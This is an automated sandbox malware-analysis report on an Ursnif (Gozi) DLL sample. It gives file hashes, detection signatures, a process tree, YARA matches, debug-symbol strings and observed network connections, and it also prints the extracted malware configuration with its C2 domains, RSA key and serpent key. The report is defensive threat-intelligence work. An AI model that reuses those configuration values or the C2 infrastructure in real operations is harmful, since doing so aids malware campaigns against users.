Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report m87xfb63XU.dll

Overview

General Information

Sample Name:m87xfb63XU.dll
Analysis ID:500399
MD5:5aa733e108f0fa41df88cea0a309affe
SHA1:ce79918ca7845f2163360ea40a251912998ea226
SHA256:1be687a0453f23ea53b94a4447c926a9b4b6e01c2788e641b76eb4a5215bd960
Tags:BRTdllgeoGoziISFBITAUrsnif
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Writes or reads registry keys via WMI
Writes registry values via WMI
Uses 32bit PE files
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Launches processes in debugging mode, may be used to hinder debugging
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6444 cmdline: loaddll32.exe 'C:\Users\user\Desktop\m87xfb63XU.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 6408 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\m87xfb63XU.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 4352 cmdline: rundll32.exe 'C:\Users\user\Desktop\m87xfb63XU.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 4520 cmdline: rundll32.exe C:\Users\user\Desktop\m87xfb63XU.dll,BeGrass MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 6368 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4520 -s 876 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 6952 cmdline: rundll32.exe C:\Users\user\Desktop\m87xfb63XU.dll,Fieldeight MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 5396 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6952 -s 640 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
      • WerFault.exe (PID: 1280 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6952 -s 640 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 6936 cmdline: rundll32.exe C:\Users\user\Desktop\m87xfb63XU.dll,Often MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 3676 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6936 -s 832 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "UmEkthy8LQToWYBqtBaWyLn/P1d2KjpXi9nl2is1X7NEi7AW4Al92U7HvBiCwWHgXhs6UyTZ7q6npv3YCi+rPS7xAyorWWgcyyviEpE9CETDXviZ72XZkxmen4ztvEtct+obFAEe0tiXOsfOcC8xDsI0CHPpvmUknsexTYqAJgwcghgx1mGHx/yFM4fnPYw4mFFE6bVI7eMnbu1CuunRmAVRDHZ7MAS7zSkAmYjeo1zAzRnOEWgblRHwenmwlBtp0SFGuYCGVe3TZZ4Nndgpd5xpSeLOoSZi/fRXjtS8b6LXBS/zslRCRObMDjDX4pa1fM1uOgFHyvjANgWJpZ272bpOHjM52/hsEGZXskaNztU=", "c2_domain": ["msn.com/mail", "breuranel.website", "outlook.com/signup", "areuranel.website"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.829711196.0000000004CD0000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000000.00000002.828285916.0000000002F19000.00000004.00000040.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
      00000000.00000003.573182276.00000000034C8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000000.00000003.575886663.00000000034C8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000003.00000003.577592974.00000000050C8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 30 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.3.rundll32.exe.2f3a31a.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              0.2.loaddll32.exe.2f194a0.1.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                2.3.rundll32.exe.2f3a31a.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                  0.3.loaddll32.exe.d5a31a.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                    4.3.rundll32.exe.68a31a.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                      Click to see the 13 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 00000000.00000003.512556680.0000000000D50000.00000040.00000001.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "UmEkthy8LQToWYBqtBaWyLn/P1d2KjpXi9nl2is1X7NEi7AW4Al92U7HvBiCwWHgXhs6UyTZ7q6npv3YCi+rPS7xAyorWWgcyyviEpE9CETDXviZ72XZkxmen4ztvEtct+obFAEe0tiXOsfOcC8xDsI0CHPpvmUknsexTYqAJgwcghgx1mGHx/yFM4fnPYw4mFFE6bVI7eMnbu1CuunRmAVRDHZ7MAS7zSkAmYjeo1zAzRnOEWgblRHwenmwlBtp0SFGuYCGVe3TZZ4Nndgpd5xpSeLOoSZi/fRXjtS8b6LXBS/zslRCRObMDjDX4pa1fM1uOgFHyvjANgWJpZ272bpOHjM52/hsEGZXskaNztU=", "c2_domain": ["msn.com/mail", "breuranel.website", "outlook.com/signup", "areuranel.website"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: m87xfb63XU.dllReversingLabs: Detection: 22%
                      Source: m87xfb63XU.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: unknownHTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.3:49782 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.3:49784 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.3:49793 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.101.60.226:443 -> 192.168.2.3:49794 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.97.151.82:443 -> 192.168.2.3:49795 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.3:49796 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.97.151.2:443 -> 192.168.2.3:49797 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.97.151.66:443 -> 192.168.2.3:49798 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.3:49846 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.3:49848 version: TLS 1.2
                      Source: m87xfb63XU.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdb{: source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.557399888.00000000034E1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: iphlpapi.pdb_:IE source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: sfc_os.pdb_POei source: WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp
                      Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: sfc_os.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.580492113.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: cryptbase.pdbT$ source: WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: CoreMessaging.pdb_ source: WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593784866.0000000004EF2000.00000004.00000040.sdmp
                      Source: Binary string: lbase.pdb source: WerFault.exe, 0000000D.00000003.552510597.0000000004D73000.00000004.00000001.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.580492113.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: wUxTheme.pdbK@q source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: bcrypt.pdbi: source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000D.00000003.561052377.00000000050F0000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580812723.0000000005700000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593688376.0000000004EE0000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.557389440.00000000034DB000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: profapi.pdbEPue source: WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 0000000D.00000003.560947472.00000000050F2000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580864219.0000000005704000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593490738.0000000004EE2000.00000004.00000040.sdmp
                      Source: Binary string: CoreMessaging.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593784866.0000000004EF2000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdbQPIer source: WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.580492113.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: rundll32.pdbk source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.580492113.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000000D.00000002.586318313.00000000008D2000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000002.594044860.0000000002FE2000.00000004.00000001.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.580492113.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: ntmarta.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.580492113.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: powrprof.pdbf$ source: WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdbM:{E source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdb@$ source: WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.580492113.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdb source: WerFault.exe, 0000000D.00000003.561222548.0000000005102000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: mpr.pdb source: WerFault.exe, 0000000D.00000003.561052377.00000000050F0000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580812723.0000000005700000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593688376.0000000004EE0000.00000004.00000040.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.580492113.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: mpr.pdb@ source: WerFault.exe, 00000014.00000003.593688376.0000000004EE0000.00000004.00000040.sdmp
                      Source: Binary string: fltLib.pdb+:EE source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: setupapi.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: upwntdll.pdb source: WerFault.exe, 00000014.00000003.578932063.0000000004B9E000.00000004.00000001.sdmp
                      Source: Binary string: wsspicli.pdbX$ source: WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: winspool.pdbe: source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdbU:CEt source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdbk source: WerFault.exe, 0000000D.00000003.560947472.00000000050F2000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580864219.0000000005704000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593490738.0000000004EE2000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000010.00000003.557389440.00000000034DB000.00000004.00000001.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdbC:}E source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: winspool.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.580492113.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: winspool.pdbCP{e. source: WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdbq:oE source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 0000000D.00000003.560947472.00000000050F2000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580864219.0000000005704000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593490738.0000000004EE2000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: WinTypes.pdbj7 source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: TextInputFramework.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: AcLayers.pdb source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.580492113.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: CoreUIComponents.pdbC source: WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: sfc.pdbC source: WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: c:\wheel\receive\Many-rise\score.pdb source: loaddll32.exe, 00000000.00000002.828952358.000000006E83B000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.829929626.000000006E83B000.00000002.00020000.sdmp, m87xfb63XU.dll
                      Source: Binary string: sechost.pdbw:aE source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000D.00000003.561052377.00000000050F0000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580812723.0000000005700000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593688376.0000000004EE0000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000D.00000003.552382095.0000000002F9A000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.558219704.00000000034E6000.00000004.00000001.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000D.00000003.560947472.00000000050F2000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580864219.0000000005704000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593490738.0000000004EE2000.00000004.00000040.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000D.00000003.561052377.00000000050F0000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580812723.0000000005700000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593688376.0000000004EE0000.00000004.00000040.sdmp
                      Source: Binary string: setupapi.pdb!:_Er source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000D.00000003.561052377.00000000050F0000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580812723.0000000005700000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593688376.0000000004EE0000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdbY:wE source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: rundll32.pdb source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.580492113.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000010.00000003.557399888.00000000034E1000.00000004.00000001.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: sfc.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdbIPae source: WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp
                      Source: Binary string: ntmarta.pdbH7|E source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdbN$ source: WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdb_ source: WerFault.exe, 0000000D.00000003.561222548.0000000005102000.00000004.00000040.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.580492113.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.580492113.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdbk source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.580492113.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: shlwapi.pdbo: source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdbR$ source: WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdbwPge source: WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp

                      Networking:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: www.msn.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: areuranel.website
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 40.97.161.50 187
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: breuranel.website
